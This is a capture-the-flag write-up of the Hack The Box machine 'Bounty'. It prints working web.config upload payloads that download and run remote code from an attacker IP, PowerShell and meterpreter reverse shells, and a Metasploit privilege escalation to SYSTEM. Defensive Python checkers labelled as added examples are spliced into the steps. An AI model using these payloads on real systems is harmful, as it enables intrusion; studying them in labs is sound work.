Bounty-htb-writeup

0x00 Skills covered in this lab

Skills in this chapter: a hostile target environment, painful directory and file scanning, upload of an aspx service configuration file (web.config), initial shell via Invoke-PowerShellTcp.ps1, JuicyPotato attack

Reference link: https://0xdf.gitlab.io/2018/10/27/htb-bounty.html

0x01 Getting user access

1. Get the target IP address: 10.10.10.93

2. Scan the open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.10.93 -oG allports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-21 14:47 CST
Nmap scan report for 10.10.10.93
Host is up (0.45s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80 -sC -sV --min-rate=10000 10.10.10.93 -oG allports2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-21 14:48 CST
Nmap scan report for 10.10.10.93
Host is up (0.40s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.82 seconds

3. Look at the site's home page

http://10.10.10.93/

4. Scan for directories

root@kali# gobuster -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_root -x aspx

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.93/
[+] Threads : 30
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Output file : gobuster_root
[+] Status codes : 301,302,307,200,204
[+] Extensions : .aspx
=====================================================
/transfer.aspx (Status: 200)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)
=====================================================

5. Check the path that returned 200

http://10.10.10.93/transfer.aspx

6. Try a null-byte (%00) truncation upload

Content-Disposition: form-data; name="FileUpload1"; filename="cmdasp.aspx%00.jpg"
Content-Type: application/octet-stream

7. The upload reports success, but the file still cannot be reached when accessed directly.

8. Reading through the walkthrough, it turns out that a configuration-type file has to be uploaded here.

I then looked for file extensions that ASP.NET will parse and found the official documentation via Google, ASP.NET Web Project File Types: https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN

9. After trying all sorts of tweaks, the upload finally succeeds and can be exploited. The lab environment really is hostile!

Quote: a configuration file (usually Web.config) containing XML elements that represent settings for ASP.NET features.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!--
<%
Set obj = CreateObject("WScript.Shell")
obj.Exec("cmd /c powershell IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.11/Invoke-PowerShellTcp.ps1')")
%>
-->

Append the following line to the end of Invoke-PowerShellTcp.ps1.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.11 -Port 443
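From the defender's side, the web.config above is recognisable by three settings: a handler that maps *.config to asp.dll, the removal of .config from request filtering, and ASP tags hidden in an XML comment after the root element. The checker below is an added example (not code from the writeup or from the referenced blog) that flags all three; the two sample configs are constructed, and the command in the malicious sample is a placeholder.

```python
# Added example (not from the original writeup): flag the settings a hostile
# web.config uses to turn itself into server-side code, as seen on this box.
import re
import xml.etree.ElementTree as ET

# Mapping *.config to one of these makes IIS execute the config file itself.
SCRIPT_PROCESSOR_HINTS = ("asp.dll", "aspnet_isapi.dll", "php", "cgi")

def audit_web_config(text: str) -> list[str]:
    """Return findings for a web.config body; an empty list means nothing flagged."""
    findings = []
    # ASP tags after </configuration> inside an XML comment: the XML parser
    # ignores them, but asp.dll runs them once the handler above is mapped.
    if re.search(r"<%.*?%>", text, re.S):
        findings.append("ASP code block (<% ... %>) present in config file")
    end = text.find("</configuration>")
    xml_part = text if end < 0 else text[: end + len("</configuration>")]
    try:
        root = ET.fromstring(xml_part.strip().encode("utf-8"))
    except ET.ParseError as exc:
        return findings + [f"malformed XML: {exc}"]
    for add in root.iter("add"):  # handler mappings (and any other <add>)
        proc = add.get("scriptProcessor", "")
        if any(h in proc.lower() for h in SCRIPT_PROCESSOR_HINTS):
            findings.append(f"handler maps {add.get('path')} to script processor {proc}")
    for rm in root.iter("remove"):  # request-filtering protections being removed
        if rm.get("fileExtension", "").lower() == ".config":
            findings.append("request filtering: .config removed from blocked fileExtensions")
        if rm.get("segment", "").lower() == "web.config":
            findings.append("request filtering: web.config removed from hiddenSegments")
    return findings

# Constructed sample modelled on the config in this writeup (command is a placeholder).
MALICIOUS_SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule"
 scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified"
 requireAccess="Write" preCondition="bitness64" />
</handlers>
<security><requestFiltering>
<fileExtensions><remove fileExtension=".config" /></fileExtensions>
<hiddenSegments><remove segment="web.config" /></hiddenSegments>
</requestFiltering></security>
</system.webServer></configuration>
<!-- <% Set obj = CreateObject("WScript.Shell")
obj.Exec("cmd /c echo placeholder") %> -->
"""

# Constructed benign sample: only sets a default document, no handler or filter changes.
CLEAN_SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer>
<defaultDocument><files><add value="index.aspx" /></files></defaultDocument>
</system.webServer></configuration>"""
```

The same rules also describe the mitigation: an upload directory should never allow web.config at all, and `audit_web_config` returning anything for a user-supplied file is grounds to reject it.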

10. Upload and browse to our config file

http://10.10.10.93/uploadedfiles/web.config

11. Our own web server receives the download request from the target

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [23/Mar/2024 15:58:23] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

12. Get the initial reverse shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\windows\system32\inetsrv> cd C:\Users\merlin\Desktop\
PS C:\Users\merlin\Desktop> dir
PS C:\Users\merlin\Desktop> cd ../
PS C:\Users\merlin> cd ../
PS C:\Users> dir


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 5/31/2018 12:18 AM Administrator
d---- 5/30/2018 4:44 AM Classic .NET AppPool
d---- 5/30/2018 12:22 AM merlin
d-r-- 5/30/2018 5:44 AM Public


PS C:\Users> cd Public
PS C:\Users\Public> cd Desktop
PS C:\Users\Public\Desktop> dir
PS C:\Users\Public\Desktop> Get-ChildItem : Access to the path 'C:\Users\Public\Desktop' is denied.
At line:1 char:4
+ dir <<<<
+ CategoryInfo : PermissionDenied: (C:\Users\Public\Desktop:Strin
g) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.
Commands.GetChildItemCommand


PS C:\Users\Public\Desktop> cd C:\Users\merlin\Desktop
PS C:\Users\merlin\Desktop> dir
PS C:\Users\merlin\Desktop> ls
PS C:\Users\merlin\Desktop> ls -la
PS C:\Users\merlin\Desktop> Invoke-PowerShellTcp : A parameter cannot be found that matches parameter name
'la'.
At line:128 char:21
+ Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.14.11 -Port 443
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep
tion
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
n,Invoke-PowerShellTcp


PS C:\Users\merlin\Desktop> dir
PS C:\Users\merlin\Desktop> cd ../
PS C:\Users\merlin> dir


Directory: C:\Users\merlin


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r-- 5/30/2018 12:22 AM Contacts
d-r-- 5/31/2018 12:17 AM Desktop
d-r-- 5/30/2018 12:22 AM Documents
d-r-- 5/30/2018 12:22 AM Downloads
d-r-- 5/30/2018 12:22 AM Favorites
d-r-- 5/30/2018 12:22 AM Links
d-r-- 5/30/2018 12:22 AM Music
d-r-- 5/30/2018 12:22 AM Pictures
d-r-- 5/30/2018 12:22 AM Saved Games
d-r-- 5/30/2018 12:22 AM Searches
d-r-- 5/30/2018 12:22 AM Videos


PS C:\Users\merlin> cd Desktop
PS C:\Users\merlin\Desktop> dir /ah
PS C:\Users\merlin\Desktop> Get-ChildItem : Cannot find path 'C:\ah' because it does not exist.
At line:1 char:4
+ dir <<<< /ah
+ CategoryInfo : ObjectNotFound: (C:\ah:String) [Get-ChildItem],
ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetCh
ildItemCommand


PS C:\Users\merlin\Desktop> dir /ah
PS C:\Users\merlin\Desktop> Get-ChildItem : Cannot find path 'C:\ah' because it does not exist.
At line:1 char:4
+ dir <<<< /ah
+ CategoryInfo : ObjectNotFound: (C:\ah:String) [Get-ChildItem],
ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetCh
ildItemCommand


PS C:\Users\merlin\Desktop>

13. The reverse shell this script gives really is a hostile environment, and the user flag is a hidden file as well; let's grab the first flag below.

PS C:\Users\merlin\Desktop> type user.txt
94f4a4b6580852a2ca00499488db17c2
PS C:\Users\merlin\Desktop>

0x02 Getting SYSTEM access

14. Check the system information and the current user's privileges

PS C:\Users\merlin\Desktop> systeminfo

Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 3/23/2024, 9:57:15 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,574 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,571 MB
Virtual Memory: In Use: 524 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
PS C:\Users\merlin\Desktop


PS C:\Users\merlin\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\merlin\Desktop>

15. Because the target environment is so hostile, go straight for a potato privilege escalation, combined with msf.

https://jlajara.gitlab.io/Potatoes_Windows_Privesc

Then upload JuicyPotato and gain SYSTEM. See here for details on potato attacks. The CLSID list is here.

16. First set up a listener in msf
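What makes the merlin account a potato candidate is visible in the whoami /priv output of step 14: SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege are held by the token, and the Disabled state on the latter does not protect anything because a process can enable a privilege its token already holds. The triage helper below is an added example (not code from the writeup); the sample output is constructed in the same format as the page's listing.

```python
# Added example (not from the writeup): triage `whoami /priv` output for the
# token privileges that potato-family escalations depend on.
TOKEN_ABUSE_PRIVS = {
    "SeImpersonatePrivilege": "impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
}

def parse_whoami_priv(output: str) -> dict[str, str]:
    """Map privilege name -> state (Enabled/Disabled) from `whoami /priv` text."""
    privs = {}
    for line in output.splitlines():
        parts = line.split()
        # Data rows start with the Se* privilege name and end with the State column.
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs

def potato_exposure(privs: dict[str, str]) -> list[str]:
    """Privileges present in the token that matter for potato attacks.

    The Enabled/Disabled state is deliberately ignored: a process can enable
    any privilege its token already holds, so presence is what a defender
    should act on (patching and not granting these to app-pool identities).
    """
    return [name for name in TOKEN_ABUSE_PRIVS if name in privs]

# Constructed sample in the format the writeup shows for the merlin app-pool user.
SAMPLE = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
"""
```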

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST=10.10.14.11
[-] Unknown datastore option: LHOST=10.10.14.11.
Usage: set [options] [name] [value]

Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore.

If setting a PAYLOAD, this command can take an index from `show payloads'.

OPTIONS:

-c, --clear Clear the values, explicitly setting to nil (default)
-g, --global Operate on global datastore variables
-h, --help Help banner.

msf6 exploit(multi/handler) > set LHOST 10.10.14.11
LHOST => 10.10.14.11
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.11:4444

17. Generate a reverse-shell payload file with msfvenom

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe

18. Start the Python web server and, using the same web.config upload trick, drop our msf payload onto the target

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [23/Mar/2024 16:21:40] "GET /shell.exe HTTP/1.1" 200 -
10.10.10.93 - - [23/Mar/2024 16:30:02] "GET /shell.exe HTTP/1.1" 200 -


<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!--
<%
Set obj = CreateObject("WScript.Shell")
obj.Exec("cmd /c powershell IEX(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.11/shell.exe', 'C:\Users\merlin\Desktop\shell.exe')")
%>
-->

19. Once it is uploaded, run it from the initial shell

PS C:\Users\merlin\Desktop> dir


Directory: C:\Users\merlin\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 3/23/2024 10:30 AM 7168 shell.exe


PS C:\Users\merlin\Desktop> shell.exe


Directory: C:\Users\merlin\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 3/23/2024 10:30 AM 7168 shell.exe


PS C:\Users\merlin\Desktop> Invoke-PowerShellTcp : The term 'shell.exe' is not recognized as the name of a
cmdlet, function, script file, or operable program. Check the spelling of the n
ame, or if a path was included, verify that the path is correct and try again.
At line:128 char:21
+ Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.14.11 -Port 443
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep
tion
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
n,Invoke-PowerShellTcp


PS C:\Users\merlin\Desktop> ./shell.exe
PS C:\Users\merlin\Desktop>

20. Then escalate privileges with msf

msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms10_092_schelevator
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/local/ms10_092_schelevator) > show options

Module options (exploit/windows/local/ms10_092_schelevator):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
TASKNAME no A name for the created task (default random)


Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows Vista / 7 / 2008 (Dropper)



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf6 exploit(windows/local/ms10_092_schelevator) > set lhost 10.10.14.11
lhost => 10.10.14.11
msf6 exploit(windows/local/ms10_092_schelevator) > set lport 3333
lport => 3333
msf6 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 10.10.14.11:3333
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Windows Server 2008 R2 (6.1 Build 7600). is not vulnerable "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms10_092_schelevator) > exploit

[*] Started reverse TCP handler on 10.10.14.11:3333
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Windows Server 2008 R2 (6.1 Build 7600). is not vulnerable "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms10_092_schelevator) > set AutoCheck false
AutoCheck => false
msf6 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 10.10.14.11:3333
[!] AutoCheck is disabled, proceeding with exploitation
[*] Preparing payload at C:\Windows\TEMP\VDgrYdO.exe
[*] Creating task: h9SRKQjDL3MEf
[*] Reading the task file contents from C:\Windows\system32\tasks\h9SRKQjDL3MEf...
[*] Original CRC32: 0xc1d2c065
[*] Final CRC32: 0xc1d2c065
[*] Writing our modified content back...
[*] Validating task: h9SRKQjDL3MEf
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "h9SRKQjDL3MEf" have been changed.
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "h9SRKQjDL3MEf" have been changed.
[*] Executing the task...
[*] Sending stage (240 bytes) to 10.10.10.93
[*] Command shell session 2 opened (10.10.14.11:3333 -> 10.10.10.93:49171) at 2024-03-23 16:48:45 +0800
[*] Deleting task h9SRKQjDL3MEf...


C:\Windows\system32>getuid
getuid
'getuid' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

21. Read the final flag

C:\Windows\system32>cd C:/Users/Administrator/Desktop/
cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5084-30B0

Directory of C:\Users\Administrator\Desktop

05/30/2018 11:18 PM <DIR> .
05/30/2018 11:18 PM <DIR> ..
03/23/2024 09:58 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 11,879,038,976 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
fd9e9fa8352d088834cb89e17bc87d32

C:\Users\Administrator\Desktop>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/142


https://sh1yan.top/2024/03/21/Bounty-htb-writeup/
Author: shiyan
Published: 21 March 2024
License